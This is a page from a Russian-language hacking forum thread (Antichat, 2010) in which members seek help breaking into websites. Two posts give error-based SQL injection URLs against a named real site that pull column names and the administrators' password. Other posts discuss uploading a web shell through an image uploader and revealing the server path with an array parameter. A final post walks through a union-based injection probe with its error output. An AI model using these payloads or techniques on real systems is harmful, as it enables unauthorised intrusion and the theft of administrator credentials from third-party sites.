HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1240 из 2422 « Первая < 240740114011901230 1236 1237 1238 1239 1240 1241 1242 1243 1244 12501290134017402240 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.04.2010, 19:48
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
thanks=)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 21.04.2010, 20:15
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
warlok, а может чо по проще?
А то там ничего не понятно!!!!!
 
Ответить с цитированием

  #3  
Старый 22.04.2010, 01:58
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от GOGA075  
warlok, а может чо по проще?
А то там ничего не понятно!!!!!
попроще - заюзай phpmyadmin
 
Ответить с цитированием

  #4  
Старый 21.04.2010, 21:08
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
Цитата:
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+column_N ame+from+information_schema.columns+where+table_Na me=0x61646D696E6973747261746F727331+limit+8,1),flo or(rand(0)*2))+From+menus+Group+By+2)a)
не мояу наыти column_name
помоqите
 
Ответить с цитированием

  #5  
Старый 21.04.2010, 23:34
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
Пипл, подскажите как дклать поиск по БД....
 
Ответить с цитированием

  #6  
Старый 22.04.2010, 07:14
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!
 
Ответить с цитированием

  #7  
Старый 22.04.2010, 13:57
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от GOGA075  
попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!
попробуй раскрыть путь, например,
getimg.php?type=main&file[]=08736050.php'
или в папках типа uploads, images глянуть. Это если файлы не в базу записываются.
 
Ответить с цитированием

  #8  
Старый 22.04.2010, 08:32
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
Цитата:
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+pass+fro m+administrators+limit+1,1),floor(rand(0)*2))+From +administrators+Group+By+2)a)
вот нашел table_name и у нево column_name а теперь не получается..
pomoqite..
 
Ответить с цитированием

про mod rewrite
  #9  
Старый 22.04.2010, 17:08
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию про mod rewrite
Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?
 
Ответить с цитированием

  #10  
Старый 22.04.2010, 19:29
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами: 9746190

Репутация: 6
По умолчанию
PHP код:
http://www.qwerty.ru/page.php?id=-999' 
-> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 50 
-> ошибка - :Unknown column '50' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 2 
-> ошибка - :Unknown column '2' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 1 
-> Грузится норм сайт...
Получается всего 1 столбец ? 0o
PHP код:
http://www.qwerty.ru/page.php?id=1'+union+select+0/* 
-> ошибка - :The used SELECT statements have a different number of columns
PHP код:
http://www.qwerty.ru/page.php?id=-1+union+select+0 */ 
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1


подскажите плз что можно сделать?
 
Ответить с цитированием
Ответ
Страница 1240 из 2422 « Первая < 240740114011901230 1236 1237 1238 1239 1240 1241 1242 1243 1244 12501290134017402240 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.